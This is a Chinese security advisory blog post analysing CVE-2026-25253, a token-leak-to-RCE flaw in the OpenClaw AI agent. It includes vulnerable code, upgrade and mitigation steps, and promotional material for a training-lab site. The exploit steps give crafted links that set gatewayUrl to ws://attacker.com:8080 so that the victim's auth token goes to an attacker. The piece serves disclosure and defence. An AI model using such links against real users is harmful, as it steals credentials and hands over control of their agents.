文章总结： 文档剖析了CVE-2026-25253（OpenClaw漏洞），这是一个高危远程代码执行漏洞，利用门槛极低，攻击者可通过恶意URL诱骗点击，导致身份验证令牌明文泄露并接管实例。文档提供了漏洞核心信息、原理、危害、应急处置方案（包括升级、临时缓解和事后处置）以及长期加固建议，旨在帮助用户识别和防御此威胁。 综合评分： 78 文章分类： 漏洞分析,漏洞预警,AI安全,解决方案,应急响应

【利用难度极低】CVE-2026-25253 OpenClaw漏洞剖析

原创

小王 小王

好靶场

2026年2月26日 07:13 四川

.5

💡 好靶场

团队宗旨：我们立志于为所有的网络安全同伴制作出好的靶场，让所有初学者都可以用最低的成本入门网络安全。所以我们团队名称就叫“好靶场”。

我们承诺每天至少更新1-2个新靶场。2026年冲刺1000个。

好靶场目前进度

681

靶场数量

200个

漏洞报告数量

抽奖马上就要截止了

【180天会员等你来抽】好靶场祝大家开工大吉

#

安全警示：CVE-2026-25253（OpenClaw漏洞）为高危RCE漏洞（CVSS 8.8），利用门槛极低，攻击者通过恶意URL诱骗点击即可窃取令牌、接管实例。

http://lishewen_openclaw.com?gatewayUrl=ws://attacker.com:8080

OpenClaw，一款可以部署在个人电脑上的AI代理，采用“龙虾”图标设计，slogan是“The AI that actually does things”OpenClaw 是一款开源、本地优先、可自主执行任务的 AI 智能体（Agent），核心是让 AI 拥有 “双手”，直接操作你的电脑完成真实工作，口号是 The AI That Actually Does Things。

一、漏洞核心信息

• • 漏洞编号：CVE-2026-25253（OpenClaw漏洞）
• • 漏洞类型：CSWSH+令牌明文泄露→RCE（CWE-669）
• • 危险等级：高危（CVSS 4.0：8.8，向量：CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:R/S:U/C:H/I:H/A:H）
• • 影响范围：OpenClaw 2026.1.29前所有版本（含Clawdbot/Moltbot）
• • 修复方案：升级至2026.1.29+，移除URL读取gatewayUrl功能，新增连接确认机制

二、漏洞原理

gatewayUrl未校验

pp-settings.ts会盲目接受URL中的gatewayUrl查询参数，并将其持久化到存储中。例如，https://localhost?gatewayUrl=attacker.com会将attacker.com保存为新的网关URL。

const gatewayUrlRaw = params.get("gatewayUrl");
...
if (gatewayUrlRaw != null) {
  const gatewayUrl = gatewayUrlRaw.trim();
  if (gatewayUrl && gatewayUrl !== host.settings.gatewayUrl) {
    applySettings(host, { ...host.settings, gatewayUrl }); // persisted via saveSettings -> localStorage
  }
}

在应用设置（如网关URL）后，app-lifecycle.ts会立即触发connectgateway()函数。敏感令牌自动明文传输

handleConnected(host) {
  ...
  connectGateway(host); // runs immediately on load after parsing URL params
  startNodesPolling(host);
  ...
}

协议执行：gateway.ts 会自动将安全敏感的 authToken 打包到系统与新网关的连接握手过程中。

const params = { ... , authToken, locale: navigator.language };
void&nbsp;this.request<GatewayHelloOk>("connect", params);

利用步骤

1. 1. 受害者点击了恶意链接（或访问了一个将其重定向至恶意链接的网站），链接地址为：http://victim_openclaw.com?gatewayUrl=ws://attacker.com:8080。
2. 2. 在其服务器上监听WebSocket连接的攻击者会接收到身份验证令牌。

三、漏洞危害

• • 系统失控：可执行任意Shell命令、读写文件、植入后门；
• • 数据泄露：窃取API密钥、数据库凭证等敏感信息；
• • 内网渗透：作为跳板攻击内网设备，扩大危害；

四、应急处置方案

1. 官方修复（优先）

升级命令（Linux/macOS）：

npm update -g openclaw
openclaw gateway restart

验证：拼接含gatewayUrl的URL，无自动连接且弹出确认提示即为成功。

2. 临时缓解（未升级前）

• • 监听地址改为127.0.0.1，禁止公网暴露；
• • 启用强认证，限制访问IP，低权限运行服务；
• • 严禁点击不明URL，定期清理本地令牌。

3. 事后处置（疑似入侵）

• • 断网隔离→升级重启→重置所有凭证；
• • 卸载非官方插件，清理异常进程/后门；

五、长期加固建议

• • 禁用默认配置，启用强认证、IP白名单；
• • 审核插件，定期扫描安全性；
• • 监控日志，建立漏洞快速响应机制；
• • 加强内部安全培训，防范钓鱼攻击。

参考文章：

https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys

好靶场介绍

零基础入门不迷茫！专属网络安全从零到一体系化训练——配套完整靶场+精选学习资料，帮你快速搭建网安知识框架，迈出入门关键一步！

全场景实战全覆盖！聚焦Web渗透工程师核心能力，深度拆解TOP10逻辑漏洞，精通PHP代码审计、Java代码审计等核心技能，从基础原理到实战攻防，覆盖行业高频应用场景！

真实漏洞场景沉浸式体验！src训练专题重磅上线——1:1还原真实漏洞报告，让你亲身感受实战挖洞流程，积累符合企业需求的实战经验！

有宝子就问了，主播主播，这么好的靶场怎么用：

首先关注好靶场

然后发送bug，可以点击链接直接登录

福利1：

找到个人中心，邀请码输入0482d6d28539424c，白嫖14天高级会员。

福利2：

关注好靶场bilibili。拿着关注截图找到客服，领取5积分或者7天高级会员。

~ 每日限免

    为了能让更多的宝子可以免费的开启会员靶场，我们会在工作日随机开放一些靶场的限免，还请加群关注。我们会以如下的方式在群里通知。

~ 内部群

加群不收费哈！！！交流群里会每天更新限免靶场，以及免费学习资料。

进一个群就可以，所有的通知都会通知到位

进交流群，请加我好友

喜欢玩QQ的宝子们可以加这个QQ群

~

AI客服内测ing

可以完成简单的客服能力，以及靶场推荐

会员订阅

首先点击会员订阅

#

#

然后选择对应的套餐

#

#

选择去支付

#

#

支付完成后即可会员到账

#

有什么好的建议可以在留言区评论哦

#

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：好靶场 小王 小王《【利用难度极低】CVE-2026-25253 OpenClaw漏洞剖析》